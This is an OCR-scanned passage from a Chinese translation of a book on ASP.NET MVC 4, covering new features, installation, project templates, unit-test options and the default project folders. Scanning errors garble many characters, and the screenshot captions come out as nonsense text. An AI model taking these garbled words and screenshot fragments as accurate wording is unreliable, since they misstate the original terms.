e Json.NET: Json.NET 是 一 个 操纵 JavaScript 对 象 符 号 (JavaScript Object Notation,， 
JSON) 中 信息 的 .NET 库 。 它 作为 Web API 的 一 部 分 包含 在 MVC 4 中 ， 从 而 可 以 实 
现 将 数据 序列 化 为 JSON 格式 , 序列 化 过 程 中 考虑 到 了 数据 契约 (data contracts)、 匿 
名 类 型 、 动 态 类 型 、 日 期 、 时 间 路 度 (TimeSpans)、 对 象 引 用 保存 (object reference 
preservation)、 缩 进 (indenting)、 能 峰 式 大 小 写 风 格 (camel casing) 以 及 许多 其 他 有 用 
的 序列 化 功能 。 此 外 ,还 可 以 利用 Json.NET 的 其 他 功能 ,比如 LINQ to JSON 和 JSON 
到 XML 的 目 动 转换 。 
e DotNetOpenAuth: MVC 使 用 DotNetOpenAuth 来 支持 基于 OpenID- 和 OAuth- 的 登 
录 ， 这 种 登录 需要 使 用 第 三 方 身 份 提供 器 。Account 控制 器 通过 设置 可 以 很 容易 
地 添加 对 Facebook、Microsoft、Google 和 Twitter 的 支持 ; 然而 ， 由 于 这 些 登 录 
建立 在 OpenID 和 OAnuth 之 上 ， 因 此 我 们 可 以 很 容易 地 插入 其 他 提供 器 。 尽 管 可 
直接 使 用 DotNetOpenAuth 类 , 但 MVC 4 也 提供 了 一 个 OAuthWebSecurity( 在 
Microsoft Web.WebPages.OAnuth 名 称 空间 中 ) 来 简化 其 一 般 用 法 。 


1.1.12 ”其 他 功能 


除了 上 面 列 出 的 功能 之 外 ，MVC 4 还 包括 许多 其 他 功能 。 完 整 的 功能 列表 在 发 布 说 明 
里 ， 如 果 有 兴趣 ， 可 查阅 http://www.asp.net/whitepapers/mvc4-release-notes。 下 而 列 出 了 最 
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感 兴趣 的 且 不 与 前 而 任何 主题 适合 的 三 项 功能 : 

e。 配置 逻辑 转移 到 App_Start 尽管 新 功能 极其 精彩 ， 但 是 通过 代码 进行 的 额外 功能 
逻辑 配置 正 开 始 集中 到 Global.asax 中 的 Application Start 方法 。 庆 羊 的 是 ， 这 些 配 
署 已 经 转移 到 了 App_Start 目录 下 的 静态 类 中 。 

“AuthConfig.cs: 用 来 配置 安全 设置 ， 其 中 包括 站 点 的 OAnuth 登录 。 

“BundleConfig.cs: 用 来 注册 捆绑 和 微小 系统 使 用 的 捆绑 。 里 面 默 认 添 加 一 些 捆绑 ， 
包括 jQuery、jQueryUI、jQuery 验证 、Modernizr 和 默认 的 CSS 引用 。 

。FilterConfig.cs: 顾名思义 ， 它 是 用 来 注册 全 局 MVC 过 滤器 。 文 件 中 尽管 只 默认 
注册 一 个 过 小 器 HandleErrorAttribute， 但 这 里 绝对 是 注册 其 他 过 滤器 的 好 地 方 。 

“RouteConfig.cs: 存放 MVC 配置 语 英 、 路 由 配置 的 蜡 祖 。 第 9 章 将 详细 介绍 路 由 
机 制 |。 

。WebApiConfig.cs: 用 来 注册 Web API 路 由 ， 以 及 设置 任何 其 他 Web API 配置 设置 。 

e 空 的 MVC 项 目 模板 : 尽管 自 MVC 2 以 来 ，ASP.NET MVC 都 包含 有 Empty 项 目 
模板 ， 但 该 模板 不 真正 为 定 ; 它 仍然 包含 看 目录 结构 、 一 个 CSS 文件 以 及 许多 
JavaScript 文件 。 在 大 家 的 请 求 下 ， 该 模板 更 名 为 Basic， 并 且 新 的 Empty 项 目 模板 
真正 为 室 。 

e 在 任何 位 置 添加 控制 器 : 在 此 之 前 ，Visual Studio 的 Add Controller 菜单 项 只 有 在 
Controllers 文件 夹 上 单 击 右键 时 才 会 出 现 。 然 而 ， 使 用 Controllers 文件 夹 纯粹 是 为 
了 组 织 结构 。MVC 会 将 任何 实现 了 IController 接口 的 类 看 成 控制 器 ， 而 不 管 该 类 
在 应 用 程序 的 哪个 位 置 。 因 此 ，MVC 4 Visual Studio 工具 更 正 了 这 一 问题 ， 使 得 
Add Controller 妆 单 项 可 以 在 MVC 项 目的 任何 文件 夹 上 显示 ,这 样 就 可 以 根据 目 己 
的 需要 组 织 控制 磺 ， 比 如 分 离 成 逻辑 组 或 者 分 离 MVC 和 Web API 控制 器 。 


未 包含 在 MVC 4 中 的 功能 : 单 页 面 应 用 程序 和 Recipes 
MVC 4 测试 版 包括 了 一 些 有 趣 的 实验 性 功能 ， 但 是 这 些 功能 未 包含 在 MVC 4 的 发 布 
版 中 。 这 些 功能 后 面 计划 作为 带 外 版 发 布 。 


单 页 面 应 用 程序 

单 员 面 应 用 程序 (Single Page Application, SPA) 是 一 个 新 的 项 目 模 板 , 它 使 用 JavaScript 
和 Web API 来 构建 集中 于 客户 端 交 互 的 单 页 面 应 用 程序 ,这 种 Web 应 用 程序 具有 非常 好 的 
互动 性 和 有 效 性 ， 像 Microsoft Outlook Web Access 和 Gmail 等 ， 但 整 问 是 ， 这 种 应 用 程序 
构建 起 来 非常 困难 。 单 页 面 应 用 程序 包括 : 

e 一 组 JavaScript 库 ， 用 来 与 本 地 绥 存 数据 进行 交互 

e 其 他 Web API 组 件 ， 用 于 文 持 操作 单元 (unit of work) 和 DAL 

e 文 持 基 架 的 MVC 项 目 模板 ， 用 来 捆绑 组 件 

单 页 面 应 用 程序 的 预览 版 本 引起 了 开发 人 员 浓 厚 的 兴趣 ， 开 发 人 员 也 及 时 地 给 予 了 反 
馈 。 遗 憾 的 是 ， 开 发 团队 不 能 在 MVC 4 发 布 之 前 完成 开发 ， 而 不 得 已 从 MVC 4 RC 中 删 
除 。 目 前 仍 在 开发 过 程 中 ， 计 划 作 为 MVC 4 的 带 外 版 发 布 。 
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Recipes 

Recipes 可 以 很 容易 地 通过 NuGet 包 更 新 Visual Studio 工具 。 开 发 团队 最 初 想 用 来 扩展 
MVC 工具 ， 比 如 Add Area、Add Controller 和 Add View 对 话 框 等 。Phil 展示 了 视图 移动 器 
(View MobilizeD) 的 样 例 ，Recipes 可 以 通过 一 个 简单 的 复 选 框 来 创建 现 有 视图 的 移动 版 本 。 

然而 ， 开 发 团队 意识 到 Recipes 有 许多 潜在 的 功能 ， 而 不 仅 是 扩展 MVC 工具 。 各 式 各 
样 的 Nuget 包 可 以 受益 于 Visual Studio 工具 ， 因 为 它 提供 了 简化 的 配置 、 自 动 化 和 设计 器 
等 。 因此， 在 MVC 4 测试 版 之 后 的 版 本 中 删除 了 Recipes， 但 是 它 会 包含 在 未 来 的 NuGet 
发 布 版 本 中 。 


1.1.13 ”开源 发 布 


从 最 初版 本 开始 ，ASPNET MVC 一 直 都 遵循 开源 许可 条 例 ， 但 它 只 是 开发 的 源 代码 
而 不 是 一 个 完全 开源 的 项 目 。 我 们 可 以 阅读 源 代码 ;可 以 修改 源 代码 ， 甚 至 可 以 发 布 修改 
后 的 源 代码 ; 但 是 我 们 不 能 把 上 自己 的 代码 页 献 到 官方 的 MVC 代码 库 。 

2012 年 5 月 修改 了 ASPNET Web Stack 开源 公告 。 这 一 公告 标志 着 ，ASPNET MVC、 
ASPNET Web Pages( 包 括 Razor 视图 引擎 ) 和 ASPNET Web API 由 开源 许可 代码 正式 过 渡 到 
了 完全 的 开源 项 目 。 对 这 些 项 目的 所 有 代码 修改 和 问题 跟踪 都 能 够 反馈 到 公共 代码 库 中 ， 
并 且 在 开发 团队 同意 修改 生效 的 情况 下 ， 这 些 项 目 接受 社会 的 代码 贡献 ( 即 pull 请 求 )。 

由 于 该 项 目 己 经 成 为 开源 项 目 , 因此 即使 是 在 很 短 时 间 内 , 官方 源码 也 能 接受 一 些 bug 
修复 和 功能 增强 ， 并 且 接 受 的 这 些 更 新 将 和 MVC 4 一 起 发 布 。ASPNET 团队 会 审查 和 测 
试 外 部 提交 的 代码 ， 并 且 当 项 目 发 布 时 ， 与 前 面 的 ASPNET MVC 版 本 一 样 ， 由 Microsoft 
文 持 。 

即使 我 们 不 打算 贡献 任何 源码 ， 公 共 代 码 库 也 在 可 视 化 方面 做 了 重大 改变 。 在 过 去 ， 
需要 等 待 临时 版 本 以 了 解 开发 团队 的 最 新 工作 进展 ， 我 们 可 以 查看 新 签 入 的 源码 (网 址 
http://aspnetwebstack.codeplex.com/SourceControl/list/changesets)， 其 至 在 夜间 运行 新 发 布 的 
代码 以 测试 添加 的 新 功能 。 


1.2 创建 ASP.NET MVC 4 应 用 程序 


学 习 MVC 4 工作 原理 最 好 的 方法 是 从 创建 应 用 程序 开始 ， 下 面 就 开始 创建 。 
1.2.1 创建 ASPNET MVC 4 应 用 程序 的 软件 要 求 

MVC 4 可 在 以 下 Windows 客户 端 操作 系统 中 运行 : 

® Windows XP 

® Windows Vista 

® Windows 


® Windows®8 


也 可 运行 在 以 下 服务 器 操作 系统 中 : 
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® Windows Server 2003 

® Windows Server 2008 

® Windows Server 2008 R2 

ASPNET MVC 4 的 开发 工具 包含 在 Visual Studio 2012 中 ,也 可 安装 在 Visual Studio 2010 
SP1/Visual Web Developer 2010 Express SP1 上 。 


1.2.2 安 滩 ASPNET MVC 4 


确保 满足 了 基本 的 软件 要 求 后 ， 下 一 步 就 该 在 开发 和 生产 计算 机 上 安装 ASPNET 
MVC 4 了。 值得 庆幸 的 是 ， 安 装 过 程 非常 简单 。 


与 早期 MVC 版 本 并 行 安装 


因为 MVC 4 可 与 MVC 早期 版 本 并 行 安 装 ， 所 以 可 以 马上 安装 并 开始 使 用 ASPNET 


MVC 4。 并 且 仍 然 能 够 像 以 前 一 样 创 建 和 更 新 现 有 的 MVC1、2 和 3 应 用 程序 。 
1. 安装 ASP.NET MVC 4 开发 组 件 


ASPNET MVC 4 开发 工具 支持 Visual Studio 2010 或 Visual Studio 2012, 其 中 包括 这 两 
个 产品 的 Express 免费 版 。 

因为 MVC 4 包含 在 Visual Studio 2012 中 ， 所 以 如 果 使 用 的 开发 平台 是 Visual Studio 
2012, 则 不 用 安装 任何 插件 。 如 果 使 用 的 是 Visual Studio 2010, 那么 需要 通过 Web Platform 
Installer(http://www.microsoft.com/web/gallery/install.aspx?appid=MVC4VS2010) 或 可 执行 的 
安装 包 ( 下 载 网 址 为 http://go.microsoft.com/fwlink/?LinkID=243392) 来 安装 MVC 4。 笔 者 通 
妾 喜欢 使 用 Web Platform Imstaller( 通 贡 称 为 WebPI， 由 于 某 种 原因 笔者 通常 用 一 个 宏伟 的 
Tom Selleck 胡子 来 摘 绘 它 )， 因 为 它 仅 下 载 和 安装 计算 机 中 没有 的 组 件 ， 而 可 执行 安装 包 
是 离线 安装 的 ， 所 以 为 了 以 防 万 一 ， 安 装 包 中 包含 了 可 能 需要 的 所 有 组 件 。 


2. 在 服务 器 上 安装 MVC 4 


安装 程序 检测 其 是 否 是 在 没有 开发 环境 广 持 的 计算 机 上 运行 ， 并 且 只 安装 服务 器 部 分 。 
假如 服务 器 可 以 联网 ，WebPI 就 是 一 个 轻 量 级 的 安装 ， 因 为 它 不 需要 安装 任何 开发 工具 。 

当 在 一 台 服 务 器 上 安装 MVC 4 时 ，MVC 运行 时 程序 集 将 安装 在 全 局 程序 集 缓 存 
(GAC) 中 ， 这 样 服务 右上 的 任何 站 点 都 可 以 访问 这 些 程序 集 。 男 外 ， 发 布 在 服务 费 上 的 应 
用 程序 只 需要 包含 必要 的 程序 集 ， 而 不 必 包 含 MVC 4 已 经 在 服务 器 上 安装 的 程序 集 。 在 
过 去 ， 这 个 过 程 称 为 bin 部 署 ， 还 需要 一 些 额 外 工作 。 在 MVC 3 工具 更 新 之 前 ， 有 两 种 途 
径 可 以 完成 这 一 工作 ， 第 一 是 手工 把 程序 集 设置 到 Visual Studio 的 Copy Local 中 ， 第 二 是 
使 用 Include Deployable Assemblies 对 话 框 。 从 MVC 4 开始 ， 所 有 程序 集 都 通过 NuGet 引 
用 包含 进来 。 因 此 ， 所 有 必需 的 程序 集 都 会 自动 添加 到 bin 目录, 任何 MVC 4 应 用 程序 都 
是 bin 部 署 的 。 出 于 这 个 原因 ，Visual Studio 2012 删除 了 Include Deployable Assemblies 对 
话 框 。 
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1.2.3 创建 ASPNET MVC 4 应 用 程序 


安装 ASPNET MVC 4 后 ， 在 Visual Studio 2010 和 Visual Web Developer 2010 中 会 出 
现 一 些 新 的 选项 。 这 两 个 IDE 的 开发 经 验 是 非常 相似 的 , 因为 本 书 是 专业 系列 的 书籍 之 一 ， 
所 以 我 们 将 专注 于 Visual Studio 开发 ， 只 有 当 二 者 存在 显著 差异 时 ， 才 会 提 到 Visual Web 


Developer。 


本 书 将 零散 地 依据 MVC Music Store 教程 中 的 一 些 例子 进行 介绍 。 这 个 教程 (下 载 网 址 
为 http://mvcmusicstore.codeplex.com) 是 一 个 150 页 的 电子 书 ， 里面 涵盖 了 构建 一 个 
ASPNET MVC 4 应 用 程序 的 基本 知识 。 本 书 会 更 深入 地 进行 讲解 , 但 是 如 果 需 要 更 多 的 介 
绍 主题 的 信息 ， 有 共同 的 基础 是 不 错 的 。 


创建 一 个 新 的 MVC 项 目 : 
(1) 选择 File | New Project 选项 ， 如 图 1-6 所 示 。 


| vo Nicrosoft Visual Studio dunck Launch (Ctr+ P= OD 其 
FLIE EDIT WEW PROJECT DEBUG TEAM SQL TOQLS TEST ARCHITECTURE ANALYZE WINDOW 
加 New Projedt.. Ctris ShiftsN 
| 泡 。New Web Site... Shift+ Alt* N 站 
全 New Team Project... a 
DD New File.. 写 
| 地 Open Project.. Culs ShiftsO " 
| 缠 。Open Web Site.. Shift*e AlR*O 
刘 Connectto Team Project... 
| Open File... Chile0 
Save All Cirls Shifts5 


ET Contial 


Recert Files 
Recent Projects and Solutions 
四 Ect At=F4 


Erver Ligst Find Results 1 


图 1-6 


(2) 在 New Project 对 话 框 左 栏 的 Installed | Templates 部 分 ， 选 择 Visual C# | Web 模板 
列表 ， 这 将 在 中 间 栏 显示 Web 应 用 程序 类 型 列表 ， 如 图 1-7 所 示 。 


:NET Framework 4 =” Sortby: Default = 中 [| Search Installed Templates (Ctrl PP ~ 


| . | 和 
8-] ASP,NET Web Forms Application Visual C 芋 Type: Visual C 


A project for creating an application using 
ASP,NET MVC 4 and Web API 


a Templates 
b Visual Basic al ASP,NET MWC 3 Web Application Visual C# 
盐 isual 已 二 © 


Cs 1 看 Li 到 
8 | ASP.NET MVC 4 Web Application Visual C 训 
Pm 了 时 时 l 
@ | ASP.NET Empty Web Applicatien Visual C 室 


Es 
b SharePoint ess ASP,NET Dynamic Data Entities Web Applic...Visual C# 
本 从 
Sihverlight oe 
的 ASPNET Dyname Data Ling to SQL Web A... Visual C# 
Le 


[可 | 
鸡 ASPNET AJAN Server Control Visual CC 二 
b Visual Ce 
hh 本 | | 
b Visual F# 人 的 ASP,NET AJAX Server Control Extender Visual C$ 
SOL Server 


到 


臣 面 
b Online 和 aSPNET Server Contrel Visual CC 


Yr 


Name: MyvcMusicStore | | 


Location: c\usersJjondocuments\visual studio 11\Proypects | Browse,.. | 


solution name: vvcIMusicStore I¥| Create directory for solution 
Add to source control 


rm 


(3) 选择 ASPNET MVC 4 Web Application， 将 程序 命名 为 MvcMusicStore， 然 后 单 击 
OK 按钮 。 


1.2.4 New ASP.NET MVC 4 Project 对 十 框 


创建 一 个 新 的 MVC 4 应 用 程序 后 ,将 会 出 现 市 有 MVC 特定 选项 的 临时 对 话 框 ， 这些 
选项 用 于 决定 如 何 创建 项 目 ， 如 图 1-8 所 示 。 在 这 个 对 话 框 中 选择 的 选项 可 以 设置 应 用 程 
序 的 大 部 分 基础 结构 ， 从 账户 管理 到 视图 引擎 再 到 测试 。 


1. 应 用 程序 模板 


首先 ， 可 以 从 两 个 预 安装 项 目 模 板 中 选择 一 个 。 

e |nternet Application 模板 : 该 模板 包含 ASP.NET MVC Web 应 用 程序 的 启动 方式 ， 
程序 创建 之 后 便 可 立即 运行 ， 并 能 看 到 一 些 页 面 ， 这 可 以 在 短 短 的 一 分 钟 内 完成 ; 
除 此 之 外 , 还 包含 一 些 针 对 ASPNET Membership 系统 的 基本 账户 管理 功能 (如 第 7 
章 所 述 )。 

e Intranet Application 模板 : 该 模板 是 作为 ASP.NET MVC 3 工具 更 新 的 一 部 分 添加 
的 ， 它 与 mtemet Application 模板 相似 ， 但 是 它 的 账户 管理 功能 不 是 针对 ASPNET 
Membership 系统 而 针对 Windows 账户 。 

e Basic 模板 : 该 模板 非常 小 ， 其 中 除了 包含 基本 的 文件 夹 、CSS 和 MVC 应 用 程序 
基础 结构 之 外 ， 别 无 其 他 。 如 果 运 行使 用 Empty 模板 创建 的 应 用 程序 ， 将 会 出 现 错 
误 提 示 消 奶 一 一 您 需要 设置 局 动 项 。 既然 这 样 ,为 什么 还 要 有 Empty 模板 呢 ? 其 实 
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Basic 模板 是 为 具有 ASPNET MVC 开发 经 验 的 人 员 设 计 的 ， 它 可 以 按照 他 们 的 想 
法 精确 地 设置 和 配置 程序 。 

e Empty 模板 : Basic 模板 过 去 称 为 Empty 模板 ， 但 是 开发 人 员 抱 扰 Empty 模板 不 够 
宇 。 在 MVC 4 中 ， 先 前 的 Empty 模板 更 名 为 Basic， 新 的 Empty 模板 很 空 ， 里 面 
只 有 必需 的 程序 集 和 基本 的 目录 结构 ， 仅 此 而 已 。 

e Mobile Application 模板 : 正如 本 章 前 面部 分 所 述 ，Mobile Application 模板 使 用 
jQuery Mobile 进行 预 配 置 , 这 样 就 启动 创建 一 个 只 能 仅 移动 访问 的 网 站 。 该 模 极 中 
包括 移动 视觉 主题 、 触 摸 优 化 的 UI， 还 文 持 Ajax 导航 。 

e Web API 模板 : ASPNET Web API 是 一 个 创建 HTTP 服务 的 框架 ， 在 第 11 章 中 将 
会 进行 详细 介绍 。Web API 模板 和 Internet Application 模板 相似 ， 但 它 简 化 为 Web 
API 开发 。 例 如 ，Web API 中 没有 任何 用 户 账 户 管理 功能 ， 这 是 因为 它 的 账户 管理 
与 标准 MVC 账户 管理 大 相 径 庭 。Web API 的 功能 也 出 现在 其 他 MVC 项 目 模 板 中 ， 
甚至 在 非 MVC 项 目 类 型 中 都 有 出 现 。 


Project Template 


Select a template 

二 Cn (s Cn A default ASPJNET MVC 4 project with an | = 

8] 8- 过 | = secount controller that uses forms 
Empty Basic a Menet Suthentie ation. 

| Apphieation 


| | 
ej 。 e@ 
Mobile Web API 
Applicatian 


ViEw engine 


Create a unit test project 
Test proleet name 
hyvech Musiciore. Tests 
Test frameworke 


Visual Sudo Unt Test 


2. 视图 引擎 

在 New ASPNET MVC 4 Project 对 话 框 中 的 下 一 个 选项 是 一 
个 视图 引擎 下 拉 框 。 视 图 引擎 的 作用 是 在 ASPNET MVC 应 用 程 
序 中 提供 不 同 的 模板 语言 来 生成 HTML 标记 。 在 ASPNET MVC3 
之 前 ， 视 图 引擎 仅 有 的 内 置 选 项 是 ASPX 或 Web Forms， 至 今 这 
一 选项 仍然 存在 ， 如 图 1-9 所 示 。 
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然而 ，MVC 3 在 下 拉 框 中 又 浴 加 了 一 个 新 选项 : Razor。 第 3 章 将 详细 介绍 Razor 视图 
引擎 。 


3. 测试 


所 有 的 内 阁 项 目 模板 都 有 一 个 选项 ， 用 来 (使 用 样本 单元 测试 ) 创 建 单元 测试 项 目 ， 如 
图 1-10 所 示 。 


Create a Unt tert proyect 


图 1-10 


在 创建 单元 测试 项 目 时 ， 如 果 不 选择 这 个 复 选 框 ， 将 意味 看 创建 的 项 目 不 进 行 任何 单 
元 测试 ， 从 而 该 项 目 也 没有 其 他 可 以 做 的 。 


推荐 : 选中 这 个 复 选 框 

笔者 建议 养 成 在 创建 项 目 时 选中 Create a unit test project 复 选 框 的 习惯 。 

本 书 将 回 您 “推销 ”单元 测试 的 “信仰 ” 不 仅仅 是 这 样 ， 单 元 测试 贯穿 全 书 ， 在 
第 12 章 中 将 专门 进行 介绍 , 其 中 涵盖 了 单元 测试 和 测试 模式 , 但 不 会 强制 您 非得 接受 这 个 

曾经 与 笔者 交谈 的 大 部 分 开发 人 员 部 一 人 致 认为 单元 测试 非常 重要 。 那 些 不 用 单元 测试 
的 人 员 想 用 ， 但 又 担心 太 难 。 他 们 不 知道 从 哪里 入 手 ， 担 心 会 出 错 ， 会 次 痪 反 。 笔 者 理解 
他 们 的 感受 ， 因 为 笔者 也 有 过 这 样 的 经 历 。 

本 书 的 推销 方式 : 只 需要 选中 这 个 复 选 框 。 没 必要 知道 为 什么 要 这 样 做 ， 也 不 需要 
ALT.NET tattoo 或 认证 。 本 书 涵盖 一 些 入 门 级 的 单元 测试 内 容 ， 但 是 单元 测试 入 门 的 最 好 
方式 是 仅仅 选中 这 个 复 选 框 ， 后 面 可 以 在 不 设置 任何 内 容 的 情况 下 编写 一 些 测试 代码 。 

选中 Create a unit test project 复 选 框 之 后 又 将 会 有 一 些 选 项 : 

e 第 一 个 选项 很 简单 一 一 将 测试 项 目 重 命名 为 任何 想 要 的 名 称 。 

e 第 二 个 选项 是 选择 一 个 测试 框架 ， 如 图 1-11 所 示 。 


区 Create a unit test project 


Test project name: 


NhvechMdusicStore., Tests 


Test framework: 


图 1-11 
从 图 1-11 中 可 以 注意 到 这 个 选项 只 有 一 个 测试 框架 选项 ， 这 样 看 起 来 没有 太 大 意义 。 


21 


22 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


之 所 以 将 这 个 选项 用 一 个 下 拉 杠 显示， 是 因为 可 以 用 这 个 对 话 框 注册 单元 测试 框架 。 如 果 
已 经 安装 了 其 他 单元 测试 框架 ( 像 xUnit、NUnit 和 MbUnit 等 )， 那 么 它们 也 将 会 出 现在 下 
拉 列 表 中 。 


注意 只 有 Visual Studio 2012 Professional 及 更 新 版 本 才 支 持 Visual Studio 
Unit Test 框架 。 如 果 使 用 Visual Studio 2012 Standard Edition 或 Express， 要 想 
使 这 个 下 拉 列 表 显 示 出 来 ， 需 要 下 载 安 装 NUnit、MbUnit 或 ASPNET MVC 
的 XUnit 扩展 。 


用 单元 测试 框架 下 拉 框 注册 单元 测试 框架 

是 否 想 知道 如 何 使 用 MVC New Project 对 话 框 注册 一 个 测试 框架 ? 

这 一 过 程 在 MSDN(http://msdn.microsoft.com/en-us/library/dd381614.aspx) 中 有 详细 介 
绍 ， 主 要 分 为 两 步 : 

(1) 为 新 的 MVC 测试 项 目 创建 和 安装 模板 项 目 。 

(2) 通过 在 HKEY _CURRENT USER\Software\Microsoft\VisualStudio\10.0 ConfigMVCA\ 
TestProjectTemplates 中 添加 一 些 注册 条 目 来 注册 测试 项 目 类 型 。 

这 些 是 包含 在 一 个 单元 测试 框架 安装 过 程 中 的 常规 过 程 ， 当 然 如 果 想 要 的 话 ， 还 可 以 
很 容易 地 自 定义 这 些 过 程 。 


检查 在 New ASPNET MVC 4 Project 对 话 框 中 的 设置 , 确保 它们 与 图 1-12 中 的 设置 匹 
配 ， 然 后 单 击 OK 按钮 。 
[New ASPNET M a 3 Ce | i ei 


Propect Template 


Select a hemplate Descnptione : 


[A delault ASP,NET MVC 4 project with en | = 
| Wee ount controlber that vses fomms 
tranel | uthentic stion. 
Ba Apphcation 


habe Wi | 
applcatben 


| Yew ongne 
| Razor 


,rete s wrt best projtct 


Test Eroject Name 
hehdusre Sbone. Tests 
Test framewortk: 


Visual Studie Unit Test 
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这 样 就 创建 了 一 个 包含 两 个 项 目的 解决 方案 ,其 中 一 个 是 Web 应 用 程序 ， 另 一 个 用 来 
进行 单元 测试 ， 如 图 1-13 所 示 。 
| TT 


FE ED YEW PROECT BMAD DEBUG TEAM 30 IOMSs TEST ARCHITECTURE 上 NALYEE WMOOW HELP 


| 


maol 


A 琶 A 同 二 


Bb 让 evontC eneller,es 


bb ww Hemebonbrolercs 
b 而 Fan 
bh Imag 
bh 国 Modeb 
bh 国 ripts 
b 国 We 
BB friconieo 
bh A Giobalarm 
I Padiagesoonfig 
b DD Webecorfig 
区 ] ulwcNkusicSiere Teris 
bb Bs Properie 
bh sm Rferences 
hb 闻 Controlier 
帅 ppp-Cenfg 
DD pgerconfig 


Brrr lig Fnd Revults!] 


1.3 ASP. 


NET MVC 应 用 程序 的 结构 


用 Visual Studio 创建 了 一 个 新 的 ASPNET MVC 应 用 程序 后 ， 将 自动 向 这 个 项 目 中 添 
加 一 些 文件 和 目录 ， 如 图 1-14 所 示 。 用 Internet Application 模板 创建 ASPNET MVC 项 日 
后 有 8 个 顶级 目录 ， 如 表 1-1 所 示 。 


“olution Ephlorer 


人 9- 


Search Solution Explorer (Cirle:) 


rk Properties 
References 
国 App_Data 
ml App_Start 
Content 
国 Contrcllers 
ml Filters 
Ey lImages 
Models 
国 Scripts 
加 Views 
国 favicon.ico 
6 Global.asax 
I packages,config 
bp 人 Web.config 
b Ed MvelMusicdtore,Tests 


图 ”1-14 
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表 1-1 默认 的 顶级 目录 
目 录 用 途 
/Controllers 该 目录 用 于 保存 那些 处 理 URL 请 求 的 Controller 类 


/Models 该 目录 用 于 保存 那些 表示 和 操纵 数据 以 及 业务 对 象 的 类 

/Views 该 目录 用 于 保存 那些 负责 呈现 输出 结果 (如 HTML) 的 UI 模板 文件 
/Scripts 该 目录 用 于 保存 JavaScript 库 文 件 和 脚本 (.js) 

/Jmages 该 目录 用 于 保存 站 点 使 用 的 图 像 

/Content 该 目录 用 于 保存 CSS 和 其 他 站 点 内 容 ， 而 非 脚本 和 图 像 

/Filters 该 目录 用 于 保存 过 滤器 代码 。 过 滤器 是 一 项 高 级 功能 ， 详 见 第 14 章 


/App Data 该 目录 用 于 存储 想 要 读 取 / 写 入 的 数据 文件 
该 目录 用 于 保存 一 些 功 能 的 配置 代码 ， 如 路 由 、 捆 绑 和 Web API 


区 


/App Start 


如 果 不 喜 欢 这 个 目录 结构 ， 怎 么 办 ? 

ASPNET MVC 并 不 是 非 要 这 个 结构 。 事 实 上 ， 那 些 处 理 大 型 应 用 程序 的 开发 人 员 通 
常 跨 多 个 项 目 来 分 割 应 用 程序 ， 以 便 使 该 应 用 程序 更 易于 管理 (例如 ， 数 据 模 型 类 常常 位 于 
一 个 来 日 Web 应 用 程序 的 单独 的 类 库 项 目 中 )。 然 而 ， 默 认 的 项 目 结构 确实 提供 了 一 个 很 
好 的 默认 目录 约定 ， 使 得 应 用 程序 的 关注 点 很 清晰 。 

当 进 行 扩展 时 ， 请 注意 关于 这 些 文件 或 文件 夹 的 以 下 内 容 : 

e /Controllers 目 人 展开 该 日 录 ， 将 会 发 现 Visual Studio 默 兴 同 该 项 目 中 添加 了 两 个 


e /Views 目录 ， 展 开 该 目录 ， 将 会 发 现 3 个 子 目 录 WHome、/Account 和 /Shared) 以 及 
其 中 的 一 些 模板 文件 ， 
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e /Content 和 /Scripts 目录 ， 展 开 这 两 个 目录 ， 将 发 现 一 个 Site.css 文件 (用 于 调整 站 点 
上 所 有 HTML 文件 的 样式 ) 以 及 JavaScript 库 ( 可 以 启用 应 用 程序 中 的 jQuery 支持 )， 


如 图 1-17 所 示 。 


e MvcMusicStore.Tests 项 目 ， 展 开 该 项 日 ， 将 发 现 两 个 类 ， 这 两 个 类 中 含有 对 应 于 


到 ivcMiursicstore 
b ££ Preperties 


站 references.js 
0 jquery-1.7.lintellisensejs 
0 jquery-1.71js 
0 jquery-1.7.1.min.js 
0 jquery-ui-1.8.20.s 
0 jquery-ui-1.8.20.min.js 
0 jquery.unobtrusive-ajarjs 
站 jquery.unobtrusive-ajmcminjs 
[TT jquery.validate-vsdoc.js 
0 jquery.validate.js 
0 jquery.validate.min.js 
0 jqueryvalidate.unobtrusive.js 
站 jquery.validate.unobtrusive.min.js 
0 knockout-21.0.debug.js 
0 knockout-210.js 
0 modemizr-2.53.s 
b 国 Views 
四 favicenjice 
b A Globalasax 
从 packages.config 
b DO Web.config 
4 EF] MvcMusicStore.Tests 


图 1-17 


Controller 类 的 单元 测试 (如 图 1-18 所 示 )。 


solution Explorer 
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bh 
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b wa References 人 省 OO- 5 
App Data Search olution Explorer (Ctrl+:) 
了 Se [rp] Solution “MveMusicStore’ (2 projects) 
» 国 themes 4 全 MvcMusicStore 
Secss b ££ Properties 
bp 国 Controllers " References 
b Filters 国 App_Data 
b i Images 画 App_Start 
b 国 Models Content 
4 全 | Scripts I Controllers 


Filters 

I Images 
Models 

ii Scripts 

国 Views 
fawcGn,IEa 

可] Global.asax 

I packages.config 
| Web.config 


a 区] MivcMusicStore.Tests 


b 
b 


吉 


EF Properties 
三面 References 
全 Controllers 
4 tC HomeControllerlest,cs 
4 ss HomeControllerTest 
Index) : vod 
站 About0 : void 
中 Contact() : void 
4 App.config 
i packages.config 


革 1-18 


这 些 由 Visual Studio 洲 加 的 默认 文件 提供 了 一 个 正在 运行 的 应 用 程序 的 基本 结构 ， 完 
整地 包括 了 痛 页 、 关 于 页 和 面 、 账 户 登 录 / 退 出 /注册 页 和 面 以 及 一 个 未 经 处 理 的 错误 页 面 (所 有 
日 我 绑 定 和 开 箱 即 用 的 页 面 )。 


ASPNET MVC 和 约定 


默认 情况 下 ，ASPNET MVC 应 用 程序 对 约定 的 依赖 性 很 强 。 这 样 就 避免 了 开发 人 员 
配置 和 指定 一 些 项 ， 因 为 这 些 项 可 以 根据 约定 来 推断 。 

例如 ， 当 解析 视图 模板 时 ，ASPNET MVC 采用 一 种 基于 约定 的 目录 命名 结构 ， 这 个 
约定 可 以 实现 当 从 Controller 类 中 引用 视图 引擎 时 ， 省 略 位 置 路 和 公信 息 。 默 认 情 况 下 ， 
ASPNET MVC 会 在 应 用 程序 下 的 \ViewsWControllerName 上 目录 中 查找 视图 模板 文件 。 
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设计 ASPNET MVC 是 围绕 一 些 基 于 约定 的 默认 项 ， 这 些 默 认 项 在 需要 的 时 候 可 以 被 
覆盖 。 这 个 概念 通常 称 为 “约定 优 于 配置 ”。 


1. 约定 优 于 配置 
儿 年 后 ， 在 Ruby on Rails 上 约定 优 于 配置 的 概念 流行 开 来 ， 它 的 本 质 意义 在 于 : 


